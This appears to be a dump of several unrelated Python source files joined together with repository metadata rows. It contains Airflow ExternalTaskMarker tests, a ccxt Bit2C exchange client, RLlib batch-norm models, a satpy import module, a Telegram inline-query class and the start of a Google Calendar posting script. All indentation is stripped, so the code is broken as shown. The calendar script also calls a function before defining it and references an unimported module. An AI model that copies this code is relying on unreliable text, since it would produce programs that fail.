for dag in dag_bag.dags.values():
dagrun = dag.create_dagrun(
state=State.RUNNING,
execution_date=execution_date,
start_date=execution_date,
run_type=DagRunType.MANUAL,
session=session,
)
# we use sorting by task_id here because for the test DAG structure of ours
# this is equivalent to topological sort. It would not work in general case
# but it works for our case because we specifically constructed test DAGS
# in the way that those two sort methods are equivalent
tasks = sorted((ti for ti in dagrun.task_instances), key=lambda ti: ti.task_id)
for ti in tasks:
ti.refresh_from_task(dag.get_task(ti.task_id))
tis[ti.task_id] = ti
ti.run(session=session)
session.flush()
session.merge(ti)
assert_ti_state_equal(ti, State.SUCCESS)
return tis
def assert_ti_state_equal(task_instance, state):
"""
Assert state of task_instances equals the given state.
"""
task_instance.refresh_from_db()
assert task_instance.state == state
@provide_session
def clear_tasks(
dag_bag,
dag,
task,
session,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
dry_run=False,
):
"""
Clear the task and its downstream tasks recursively for the dag in the given dagbag.
"""
partial: DAG = dag.partial_subset(task_ids_or_regex=[task.task_id], include_downstream=True)
return partial.clear(
start_date=start_date,
end_date=end_date,
dag_bag=dag_bag,
dry_run=dry_run,
session=session,
)
def test_external_task_marker_transitive(dag_bag_ext):
"""
Test clearing tasks across DAGs.
"""
tis = run_tasks(dag_bag_ext)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
clear_tasks(dag_bag_ext, dag_0, task_a_0)
ti_a_0 = tis["task_a_0"]
ti_b_3 = tis["task_b_3"]
assert_ti_state_equal(ti_a_0, State.NONE)
assert_ti_state_equal(ti_b_3, State.NONE)
@provide_session
def test_external_task_marker_clear_activate(dag_bag_parent_child, session):
"""
Test clearing tasks across DAGs and make sure the right DagRuns are activated.
"""
dag_bag = dag_bag_parent_child
day_1 = DEFAULT_DATE
day_2 = DEFAULT_DATE + timedelta(days=1)
run_tasks(dag_bag, execution_date=day_1)
run_tasks(dag_bag, execution_date=day_2)
# Assert that dagruns of all the affected dags are set to SUCCESS before tasks are cleared.
for dag in dag_bag.dags.values():
for execution_date in [day_1, day_2]:
dagrun = dag.get_dagrun(execution_date=execution_date, session=session)
dagrun.set_state(State.SUCCESS)
session.flush()
dag_0 = dag_bag.get_dag("parent_dag_0")
task_0 = dag_0.get_task("task_0")
clear_tasks(dag_bag, dag_0, task_0, start_date=day_1, end_date=day_2, session=session)
# Assert that dagruns of all the affected dags are set to QUEUED after tasks are cleared.
# Unaffected dagruns should be left as SUCCESS.
dagrun_0_1 = dag_bag.get_dag('parent_dag_0').get_dagrun(execution_date=day_1, session=session)
dagrun_0_2 = dag_bag.get_dag('parent_dag_0').get_dagrun(execution_date=day_2, session=session)
dagrun_1_1 = dag_bag.get_dag('child_dag_1').get_dagrun(execution_date=day_1, session=session)
dagrun_1_2 = dag_bag.get_dag('child_dag_1').get_dagrun(execution_date=day_2, session=session)
assert dagrun_0_1.state == State.QUEUED
assert dagrun_0_2.state == State.QUEUED
assert dagrun_1_1.state == State.QUEUED
assert dagrun_1_2.state == State.SUCCESS
def test_external_task_marker_future(dag_bag_ext):
"""
Test clearing tasks with no end_date. This is the case when users clear tasks with
Future, Downstream and Recursive selected.
"""
date_0 = DEFAULT_DATE
date_1 = DEFAULT_DATE + timedelta(days=1)
tis_date_0 = run_tasks(dag_bag_ext, execution_date=date_0)
tis_date_1 = run_tasks(dag_bag_ext, execution_date=date_1)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
# This should clear all tasks on dag_0 to dag_3 on both date_0 and date_1
clear_tasks(dag_bag_ext, dag_0, task_a_0, end_date=None)
ti_a_0_date_0 = tis_date_0["task_a_0"]
ti_b_3_date_0 = tis_date_0["task_b_3"]
ti_b_3_date_1 = tis_date_1["task_b_3"]
assert_ti_state_equal(ti_a_0_date_0, State.NONE)
assert_ti_state_equal(ti_b_3_date_0, State.NONE)
assert_ti_state_equal(ti_b_3_date_1, State.NONE)
def test_external_task_marker_exception(dag_bag_ext):
"""
Clearing across multiple DAGs should raise AirflowException if more levels are being cleared
than allowed by the recursion_depth of the first ExternalTaskMarker being cleared.
"""
run_tasks(dag_bag_ext)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
task_b_0 = dag_0.get_task("task_b_0")
task_b_0.recursion_depth = 2
with pytest.raises(AirflowException, match="Maximum recursion depth 2"):
clear_tasks(dag_bag_ext, dag_0, task_a_0)
@pytest.fixture
def dag_bag_cyclic():
"""
Create a DagBag with DAGs having cyclic dependencies set up by ExternalTaskMarker and
ExternalTaskSensor.
dag_0: task_a_0 >> task_b_0
^ |
| |
dag_1: | ---> task_a_1 >> task_b_1
| ^
| |
dag_n: | ---> task_a_n >> task_b_n
| |
-----------------------------------------------------
"""
def _factory(depth: int) -> DagBag:
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
dags = []
with DAG("dag_0", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a_0 = DummyOperator(task_id="task_a_0")
task_b_0 = ExternalTaskMarker(
task_id="task_b_0", external_dag_id="dag_1", external_task_id="task_a_1", recursion_depth=3
)
task_a_0 >> task_b_0
for n in range(1, depth):
with DAG(f"dag_{n}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a = ExternalTaskSensor(
task_id=f"task_a_{n}",
external_dag_id=f"dag_{n-1}",
external_task_id=f"task_b_{n-1}",
)
task_b = ExternalTaskMarker(
task_id=f"task_b_{n}",
external_dag_id=f"dag_{n+1}",
external_task_id=f"task_a_{n+1}",
recursion_depth=3,
)
task_a >> task_b
# Create the last dag which loops back
with DAG(f"dag_{depth}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a = ExternalTaskSensor(
task_id=f"task_a_{depth}",
external_dag_id=f"dag_{depth-1}",
external_task_id=f"task_b_{depth-1}",
)
task_b = ExternalTaskMarker(
task_id=f"task_b_{depth}",
external_dag_id="dag_0",
external_task_id="task_a_0",
recursion_depth=2,
)
task_a >> task_b
for dag in dags:
dag_bag.bag_dag(dag=dag, root_dag=dag)
return dag_bag
return _factory
def test_external_task_marker_cyclic_deep(dag_bag_cyclic):
"""
Tests clearing across multiple DAGs that have cyclic dependencies. AirflowException should be
raised.
"""
dag_bag = dag_bag_cyclic(10)
run_tasks(dag_bag)
dag_0 = dag_bag.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
with pytest.raises(AirflowException, match="Maximum recursion depth 3"):
clear_tasks(dag_bag, dag_0, task_a_0)
def test_external_task_marker_cyclic_shallow(dag_bag_cyclic):
"""
Tests clearing across multiple DAGs that have cyclic dependencies shallower
than recursion_depth
"""
dag_bag = dag_bag_cyclic(2)
run_tasks(dag_bag)
dag_0 = dag_bag.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
tis = clear_tasks(dag_bag, dag_0, task_a_0, dry_run=True)
assert [
("dag_0", "task_a_0"),
("dag_0", "task_b_0"),
("dag_1", "task_a_1"),
("dag_1", "task_b_1"),
("dag_2", "task_a_2"),
("dag_2", "task_b_2"),
] == sorted((ti.dag_id, ti.task_id) for ti in tis)
@pytest.fixture
def dag_bag_multiple():
"""
Create a DagBag containing two DAGs, linked by multiple ExternalTaskMarker.
"""
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
daily_dag = DAG("daily_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
agg_dag = DAG("agg_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
dag_bag.bag_dag(dag=daily_dag, root_dag=daily_dag)
dag_bag.bag_dag(dag=agg_dag, root_dag=agg_dag)
daily_task = DummyOperator(task_id="daily_tas", dag=daily_dag)
start = DummyOperator(task_id="start", dag=agg_dag)
for i in range(25):
task = ExternalTaskMarker(
task_id=f"{daily_task.task_id}_{i}",
external_dag_id=daily_dag.dag_id,
external_task_id=daily_task.task_id,
execution_date="{{ macros.ds_add(ds, -1 * %s) }}" % i,
dag=agg_dag,
)
start >> task
yield dag_bag
@pytest.mark.quarantined
@pytest.mark.backend("postgres", "mysql")
def test_clear_multiple_external_task_marker(dag_bag_multiple):
"""
Test clearing a dag that has multiple ExternalTaskMarker.
sqlite3 parser stack size is 100 lexical items by default so this puts a hard limit on
the level of nesting in the sql. This test is intentionally skipped in sqlite.
"""
agg_dag = dag_bag_multiple.get_dag("agg_dag")
for delta in range(len(agg_dag.tasks)):
execution_date = DEFAULT_DATE + timedelta(days=delta)
run_tasks(dag_bag_multiple, execution_date=execution_date)
# There used to be some slowness caused by calling count() inside DAG.clear().
# That has since been fixed. It should take no more than a few seconds to call
# dag.clear() here.
assert agg_dag.clear(start_date=execution_date, end_date=execution_date, dag_bag=dag_bag_multiple) == 51
@pytest.fixture
def dag_bag_head_tail():
"""
Create a DagBag containing one DAG, with task "head" depending on task "tail" of the
previous execution_date.
20200501 20200502 20200510
+------+ +------+ +------+
| head | -->head | --> -->head |
| | | / | | | / / | | |
| v | / | v | / / | v |
| body | / | body | / ... / | body |
| | |/ | | |/ / | | |
| v / | v / / | v |
| tail/| | tail/| / | tail |
+------+ +------+ +------+
"""
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
with DAG("head_tail", start_date=DEFAULT_DATE, schedule_interval="@daily") as dag:
head = ExternalTaskSensor(
task_id='head',
external_dag_id=dag.dag_id,
external_task_id="tail",
execution_delta=timedelta(days=1),
mode="reschedule",
)
body = DummyOperator(task_id="body")
tail = ExternalTaskMarker(
task_id="tail",
external_dag_id=dag.dag_id,
external_task_id=head.task_id,
execution_date="{{ macros.ds_add(ds, 1) }}",
)
head >> body >> tail
dag_bag.bag_dag(dag=dag, root_dag=dag)
return dag_bag
@provide_session
def test_clear_overlapping_external_task_marker(dag_bag_head_tail, session):
dag: DAG = dag_bag_head_tail.get_dag('head_tail')
# "Run" 10 times.
for delta in range(0, 10):
execution_date = DEFAULT_DATE + timedelta(days=delta)
dagrun = DagRun(
dag_id=dag.dag_id,
state=DagRunState.SUCCESS,
execution_date=execution_date,
run_type=DagRunType.MANUAL,
run_id=f"test_{delta}",
)
session.add(dagrun)
for task in dag.tasks:
ti = TaskInstance(task=task)
dagrun.task_instances.append(ti)
ti.state = TaskInstanceState.SUCCESS
session.flush()
# The next two lines are doing the same thing. Clearing the first "head" with "Future"
# selected is the same as not selecting "Future". They should take similar amount of
# time too because dag.clear() uses visited_external_tis to keep track of visited ExternalTaskMarker.
assert dag.clear(start_date=DEFAULT_DATE, dag_bag=dag_bag_head_tail, session=session) == 30
assert (
dag.clear(
start_date=DEFAULT_DATE,
end_date=execution_date,
dag_bag=dag_bag_head_tail,
session=session,
)
== 30
)
|
mistercrunch/airflow
|
tests/sensors/test_external_task_sensor.py
|
Python
|
apache-2.0
| 35,537
| 0.002561
|
# -*- coding: utf-8 -*-
from ccxt.async.base.exchange import Exchange
import hashlib
class bit2c (Exchange):
def describe(self):
return self.deep_extend(super(bit2c, self).describe(), {
'id': 'bit2c',
'name': 'Bit2C',
'countries': 'IL', # Israel
'rateLimit': 3000,
'hasCORS': False,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766119-3593220e-5ece-11e7-8b3a-5a041f6bcc3f.jpg',
'api': 'https://www.bit2c.co.il',
'www': 'https://www.bit2c.co.il',
'doc': [
'https://www.bit2c.co.il/home/api',
'https://github.com/OferE/bit2c',
],
},
'api': {
'public': {
'get': [
'Exchanges/{pair}/Ticker',
'Exchanges/{pair}/orderbook',
'Exchanges/{pair}/trades',
],
},
'private': {
'post': [
'Account/Balance',
'Account/Balance/v2',
'Merchant/CreateCheckout',
'Order/AccountHistory',
'Order/AddCoinFundsRequest',
'Order/AddFund',
'Order/AddOrder',
'Order/AddOrderMarketPriceBuy',
'Order/AddOrderMarketPriceSell',
'Order/CancelOrder',
'Order/MyOrders',
'Payment/GetMyId',
'Payment/Send',
],
},
},
'markets': {
'BTC/NIS': {'id': 'BtcNis', 'symbol': 'BTC/NIS', 'base': 'BTC', 'quote': 'NIS'},
'BCH/NIS': {'id': 'BchNis', 'symbol': 'BCH/NIS', 'base': 'BCH', 'quote': 'NIS'},
'LTC/NIS': {'id': 'LtcNis', 'symbol': 'LTC/NIS', 'base': 'LTC', 'quote': 'NIS'},
'BTG/NIS': {'id': 'BtgNis', 'symbol': 'BTG/NIS', 'base': 'BTG', 'quote': 'NIS'},
},
'fees': {
'trading': {
'maker': 0.5 / 100,
'taker': 0.5 / 100,
},
},
})
async def fetch_balance(self, params={}):
balance = await self.privatePostAccountBalanceV2()
result = {'info': balance}
currencies = list(self.currencies.keys())
for i in range(0, len(currencies)):
currency = currencies[i]
account = self.account()
if currency in balance:
available = 'AVAILABLE_' + currency
account['free'] = balance[available]
account['total'] = balance[currency]
account['used'] = account['total'] - account['free']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, params={}):
orderbook = await self.publicGetExchangesPairOrderbook(self.extend({
'pair': self.market_id(symbol),
}, params))
return self.parse_order_book(orderbook)
async def fetch_ticker(self, symbol, params={}):
ticker = await self.publicGetExchangesPairTicker(self.extend({
'pair': self.market_id(symbol),
}, params))
timestamp = self.milliseconds()
averagePrice = float(ticker['av'])
baseVolume = float(ticker['a'])
quoteVolume = baseVolume * averagePrice
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['h']),
'ask': float(ticker['l']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['ll']),
'change': None,
'percentage': None,
'average': averagePrice,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}
def parse_trade(self, trade, market=None):
timestamp = int(trade['date']) * 1000
symbol = None
if market:
symbol = market['symbol']
return {
'id': str(trade['tid']),
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': None,
'type': None,
'side': None,
'price': trade['price'],
'amount': trade['amount'],
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
market = self.market(symbol)
response = await self.publicGetExchangesPairTrades(self.extend({
'pair': market['id'],
}, params))
return self.parse_trades(response, market, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
method = 'privatePostOrderAddOrder'
order = {
'Amount': amount,
'Pair': self.market_id(symbol),
}
if type == 'market':
method += 'MarketPrice' + self.capitalize(side)
else:
order['Price'] = price
order['Total'] = amount * price
order['IsBid'] = (side == 'buy')
result = await getattr(self, method)(self.extend(order, params))
return {
'info': result,
'id': result['NewOrder']['id'],
}
async def cancel_order(self, id, symbol=None, params={}):
return await self.privatePostOrderCancelOrder({'id': id})
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.implode_params(path, params)
if api == 'public':
url += '.json'
else:
self.check_required_credentials()
nonce = self.nonce()
query = self.extend({'nonce': nonce}, params)
body = self.urlencode(query)
signature = self.hmac(self.encode(body), self.encode(self.secret), hashlib.sha512, 'base64')
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'key': self.apiKey,
'sign': self.decode(signature),
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
|
tritoanst/ccxt
|
python/ccxt/async/bit2c.py
|
Python
|
mit
| 6,650
| 0.001353
|
import numpy as np
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.torch.misc import SlimFC, normc_initializer as \
torch_normc_initializer
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.utils.annotations import override
from ray.rllib.utils.framework import try_import_tf, try_import_torch
tf1, tf, tfv = try_import_tf()
torch, nn = try_import_torch()
class BatchNormModel(TFModelV2):
"""Example of a TFModelV2 that is built w/o using tf.keras.
NOTE: This example does not work when using a keras-based TFModelV2 due
to a bug in keras related to missing values for input placeholders, even
though these input values have been provided in a forward pass through the
actual keras Model.
All Model logic (layers) is defined in the `forward` method (incl.
the batch_normalization layers). Also, all variables are registered
(only once) at the end of `forward`, so an optimizer knows which tensors
to train on. A standard `value_function` override is used.
"""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
# Have we registered our vars yet (see `forward`)?
self._registered = False
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
last_layer = input_dict["obs"]
hiddens = [256, 256]
with tf1.variable_scope("model", reuse=tf1.AUTO_REUSE):
for i, size in enumerate(hiddens):
last_layer = tf1.layers.dense(
last_layer,
size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name="fc{}".format(i))
# Add a batch norm layer
last_layer = tf1.layers.batch_normalization(
last_layer,
training=input_dict["is_training"],
name="bn_{}".format(i))
output = tf1.layers.dense(
last_layer,
self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="out")
self._value_out = tf1.layers.dense(
last_layer,
1,
kernel_initializer=normc_initializer(1.0),
activation=None,
name="vf")
if not self._registered:
self.register_variables(
tf1.get_collection(
tf1.GraphKeys.TRAINABLE_VARIABLES, scope=".+/model/.+"))
self._registered = True
return output, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
class KerasBatchNormModel(TFModelV2):
"""Keras version of above BatchNormModel with exactly the same structure.
IMORTANT NOTE: This model will not work with PPO due to a bug in keras
that surfaces when having more than one input placeholder (here: `inputs`
and `is_training`) AND using the `make_tf_callable` helper (e.g. used by
PPO), in which auto-placeholders are generated, then passed through the
tf.keras. models.Model. In this last step, the connection between 1) the
provided value in the auto-placeholder and 2) the keras `is_training`
Input is broken and keras complains.
Use the above `BatchNormModel` (a non-keras based TFModelV2), instead.
"""
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
inputs = tf.keras.layers.Input(shape=obs_space.shape, name="inputs")
is_training = tf.keras.layers.Input(
shape=(), dtype=tf.bool, batch_size=1, name="is_training")
last_layer = inputs
hiddens = [256, 256]
for i, size in enumerate(hiddens):
label = "fc{}".format(i)
last_layer = tf.keras.layers.Dense(
units=size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name=label)(last_layer)
# Add a batch norm layer
last_layer = tf.keras.layers.BatchNormalization()(
last_layer, training=is_training[0])
output = tf.keras.layers.Dense(
units=self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="fc_out")(last_layer)
value_out = tf.keras.layers.Dense(
units=1,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="value_out")(last_layer)
self.base_model = tf.keras.models.Model(
inputs=[inputs, is_training], outputs=[output, value_out])
self.register_variables(self.base_model.variables)
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
out, self._value_out = self.base_model(
[input_dict["obs"], input_dict["is_training"]])
return out, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
class TorchBatchNormModel(TorchModelV2, nn.Module):
"""Example of a TorchModelV2 using batch normalization."""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name, **kwargs):
TorchModelV2.__init__(self, obs_space, action_space, num_outputs,
model_config, name)
nn.Module.__init__(self)
layers = []
prev_layer_size = int(np.product(obs_space.shape))
self._logits = None
# Create layers 0 to second-last.
for size in [256, 256]:
layers.append(
SlimFC(
in_size=prev_layer_size,
out_size=size,
initializer=torch_normc_initializer(1.0),
activation_fn=nn.ReLU))
prev_layer_size = size
# Add a batch norm layer.
layers.append(nn.BatchNorm1d(prev_layer_size))
self._logits = SlimFC(
in_size=prev_layer_size,
out_size=self.num_outputs,
initializer=torch_normc_initializer(0.01),
activation_fn=None)
self._value_branch = SlimFC(
in_size=prev_layer_size,
out_size=1,
initializer=torch_normc_initializer(1.0),
activation_fn=None)
self._hidden_layers = nn.Sequential(*layers)
self._hidden_out = None
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
# Set the correct train-mode for our hidden module (only important
# b/c we have some batch-norm layers).
self._hidden_layers.train(mode=input_dict.get("is_training", False))
self._hidden_out = self._hidden_layers(input_dict["obs"])
logits = self._logits(self._hidden_out)
return logits, []
@override(ModelV2)
def value_function(self):
assert self._hidden_out is not None, "must call forward first!"
return torch.reshape(self._value_branch(self._hidden_out), [-1])
|
richardliaw/ray
|
rllib/examples/models/batch_norm_model.py
|
Python
|
apache-2.0
| 7,538
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2020 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy. If not, see <http://www.gnu.org/licenses/>.
"""Modifier classes and other related utilities."""
# file deepcode ignore W0611: Ignore unused imports in init module
from .base import ModifierBase # noqa: F401, isort: skip
from .atmosphere import CO2Corrector # noqa: F401
from .atmosphere import PSPAtmosphericalCorrection # noqa: F401
from .atmosphere import PSPRayleighReflectance # noqa: F401
from .geometry import EffectiveSolarPathLengthCorrector # noqa: F401
from .geometry import SunZenithCorrector # noqa: F401
from .spectral import NIREmissivePartFromReflectance # noqa: F401
from .spectral import NIRReflectance # noqa: F401
|
pytroll/satpy
|
satpy/modifiers/__init__.py
|
Python
|
gpl-3.0
| 1,328
| 0
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2016
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the classes that represent Telegram
InlineQueryResultCachedVideo"""
from telegram import InlineQueryResult, InlineKeyboardMarkup, InputMessageContent
class InlineQueryResultCachedVideo(InlineQueryResult):
def __init__(self,
id,
video_file_id,
title,
description=None,
caption=None,
reply_markup=None,
input_message_content=None,
**kwargs):
# Required
super(InlineQueryResultCachedVideo, self).__init__('video', id)
self.video_file_id = video_file_id
self.title = title
# Optionals
if description:
self.description = description
if caption:
self.caption = caption
if reply_markup:
self.reply_markup = reply_markup
if input_message_content:
self.input_message_content = input_message_content
@staticmethod
def de_json(data):
data = super(InlineQueryResultCachedVideo, InlineQueryResultCachedVideo).de_json(data)
data['reply_markup'] = InlineKeyboardMarkup.de_json(data.get('reply_markup'))
data['input_message_content'] = InputMessageContent.de_json(data.get(
'input_message_content'))
return InlineQueryResultCachedVideo(**data)
|
franciscod/python-telegram-bot
|
telegram/inlinequeryresultcachedvideo.py
|
Python
|
gpl-2.0
| 2,181
| 0.001376
|
#!/usr/bin/python3
'''
Calculate posting schedules in social media of events and add them to google calendar
so they can be posted using IFTTT (so dirty!)
'''
# Google Developers Console:
# project name: tdf-eventos-gcalcli
# activate gcal API
# activate OAuth 2.0 API
# instal: pip3 install --upgrade google-api-python-client
#URL SHORTENER:
# urlshortener.url.list to get a list of shortened links from user
# urlshortener.url.get get info about a shorted url
#GCAL:
# probably we could need it. event['id'] (same as event['iCalUID'], this has @google.com)
# TODO: save processed events to the txt file once the city is done. (avoid possible losts when script breaks)
# FIX: Sometimes it doesnt parse properly (example as of 2017-11-29: Primera Ecomaratón Playas Limpias, Kendo - Seminario Tierra del Fuego)
# TODO: use the metadata in file to check if it's old or not. Reason: events that span multiple days (expositions) and were added later.
# TODO: support to create shorturls
# PRobably we should read config file so we dont hardcode stuff
# TODO: find a way to fix updated events.
# - Search the event in calendar, edit
# - delete the line in processed posts and just add the new one
#
# creating function (https://developers.google.com/google-apps/calendar/v3/reference/events/update)
# []Promps user to enter text to search;
# []searches and gets id;
# prints event info
# asks what to update (start, end, title, location) add more
# creates new title/summary and description
# updates event
# use named tuples
'''>>> from collections import namedtuple
>>> Point = namedtuple('Point', ['x','y'])
>>> p = Point(x=11,y=22)
>>> p = p._replace(x=80)
>>> p
Point(x=80, y=22)
'''
#import sys
import os
import json
import argparse
import random #for the minutes
import datetime
import re
import time
# required Libs (for Google connect)
try:
from apiclient.discovery import build
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.file import Storage
from oauth2client import tools
from apiclient.errors import HttpError
import httplib2
except ImportError as e:
print (" Need Google API libs. Install with: pip3 install --upgrade google-api-python-client")
exit()
#optional libs
try:
import yaml
YAML = True
except ImportError:
#YAML = False
#print (" next time install pyyaml")
print (" Install : pip3 install pyyaml")
exit()
# --------------
# configuration
# --------------
CALENDAR_ID = "primary" #IFTTT uses the primary calendar
POST_FOLDER = '_posts'
# where the posts reside
CITIES = ('rio-grande','ushuaia','tolhuin')
# we are in a subfolder now, must get the parent folder
ROOT_DIR = os.path.dirname(os.getcwd())
PROCESSED_POSTS_FILE = "processed-posts.txt" #date,city,filename
PROCESSED_POSTS_FILE_LINE = "{ciudad}@{filename}"
# how the places folder is called. rio-grande is called riogrande
PLACES_FOLDER = "_lugares-{ciudad}"
HOUR_SCHEDULE = ('09', '13', '17', '21') #minutes are random
DAYS_BEFORE = 11 #How many days before do we start posting the event?
DAYS_SPANS_MANUAL_UPDATE = 3 # mostly for site update
GOOGLE_AUTH = "client_secrets.json"
USER_CREDENTIALS = 'gcal-tdf-credentials.json'
APPLICATION_NAME = 'tdf-eventos-gcalcli'
# -------------------
# end configuration
# -------------------
FILES_FOR_PROCESSED_LIST = list() #so we write everything once
PROCESSED_POSTS_FILE = os.path.join(os.getcwd(),PROCESSED_POSTS_FILE)
GOOGLE_AUTH = os.path.join(os.getcwd(), GOOGLE_AUTH)
USER_CREDENTIALS = os.path.join(os.getcwd(), USER_CREDENTIALS)
# be nice and allow to include the secret/keys as paramenters
parser = argparse.ArgumentParser()
parser.add_argument("--client", help="path of the client_secret.json")
parser.add_argument("--user", help="path of the user secret_key.json")
parser.add_argument("--clean", help="Cleans the processed file list", action="store_true")
parser.add_argument("--edit", help="Edit an event")
parser.add_argument("--site-update", "-su", help="Add manually, starts from today and spans " + str(DAYS_SPANS_MANUAL_UPDATE) + " days. Mostly for site updates.")
#args = vars(parser.parse_args()) #to dict
args = parser.parse_args()
if args.clean:
clean_processed_file()
exit()
if args.client or args.user:
if args.client:
GOOGLE_AUTH = args.client
if args.user:
USER_CREDENTIALS = args.user
if not os.path.exists(GOOGLE_AUTH):
print (" sorry, I need the app credentials.")
exit()
if args.edit:
#edit_event()
print ("not yet implemented. Sorry")
exit()
# --------------
# functions
# --------------
def get_processed_file():
"""Get the processed file, returning it as a list.
Returns:
list
"""
if os.path.exists(PROCESSED_POSTS_FILE):
with open(PROCESSED_POSTS_FILE,'r',encoding="utf-8") as tmp:
#readlines() includes de new-line char. we want things easy ;)
return tmp.read().splitlines()
return False
def clean_processed_file():
"""Filters processed file, deleting old entries. """
today = datetime.datetime.today()
processed_posts = get_processed_file()
if not processed_posts:
print (" there was an error with the processed file. Does it exist?")
return False
cleaned_posts = list()
for row in processed_posts:
tmp_line = row.split("@")[1]
tmp_line = tmp_line[0:10]
tmp_date = datetime.datetime.strptime(tmp_line, '%Y-%m-%d')
if tmp_date >= today:
cleaned_posts.append(row)
if len(cleaned_posts) > 0:
with open(PROCESSED_POSTS_FILE,'w',encoding="utf-8") as tmp:
tmp.write("\n".join(cleaned_posts))
print(" Processed file cleaned!")
else:
print(" Everything is ok. Processed file not modified. ")
def googleAuth():
"""Authenticate Google API call
Returns:
http object (authorized)
"""
# Storage object holds the credentials (for a single user)
# If the file does not exist, it is created.
storage = Storage(USER_CREDENTIALS)
# Get the credentials
credentials = storage.get()
if not credentials or credentials.invalid:
'''
flow = OAuth2WebServerFlow(client_id=API_CLIENT_ID,
client_secret=API_CLIENT_SECRET,
scope=['https://www.googleapis.com/auth/calendar',
'https://www.googleapis.com/auth/urlshortener']
)
'''
flow = client.flow_from_clientsecrets(
GOOGLE_AUTH,
scope=['https://www.googleapis.com/auth/calendar',
'https://www.googleapis.com/auth/urlshortener'],
)
flow.user_agent = APPLICATION_NAME
# new credentials need to be obtained.
# oauth2client.tools.run() opens an authorization server page
# in default web browser.
# The new credentials are also stored in the Storage object,
# which updates the credentials file.
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
if flags:
credentials = tools.run_flow(flow, storage, flags)
print (" storing credentials to " + USER_CREDENTIALS)
# authorize credentials
http = credentials.authorize(httplib2.Http())
return http
def useService(service_type):
""" "Shortcut" to the service/API call
Args:
service_type (str): which service? calendar or url (urlshortener)
Returns:
build object kind of thing (google)
"""
service = ("", "")
if service_type == "calendar":
service = ("calendar", "v3")
elif service_type == "url":
service = ("urlshortener", "v1")
else:
print (" wrong key for Google Service")
exit()
return build(serviceName=service[0], version=service[1], http=googleAuth())
def listEvents():
# The Calendar API's events().list method returns paginated results, so we
# have to execute the request in a paging loop. First, build the
# request object. The arguments provided are:
# primary calendar for user
service = useService('calendar')
request = service.events().list(calendarId=CALENDAR_ID)
# Loop until all pages have been processed.
while request != None:
# Get the next page.
response = request.execute()
# Accessing the response like a dict object with an 'items' key
# returns a list of item objects (events).
for event in response.get('items', []):
print ("--------------------------")
# The event object is a dict object with a 'summary' key.
print(event['summary'])
print(event['start']['dateTime'])
print(event['location'])
